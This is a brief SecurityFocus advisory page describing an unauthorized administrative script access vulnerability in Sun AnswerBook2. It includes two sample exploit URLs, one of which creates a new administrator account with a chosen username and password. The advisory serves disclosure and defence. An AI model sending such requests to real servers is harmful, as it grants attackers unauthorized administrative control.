Sun AnswerBook2 Unauthorized Administrative Script Access Vulnerability

This vulnerability may be exploited with a web browser. The following sample URLs have been submitted:

http://localhost:8888/ab2/@AdminViewError

http://localhost:8888/ab2/@AdminAddadmin?uid=foo&password=bar&re_password=bar

CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.


 

Privacy Statement
Copyright 2010, SecurityFocus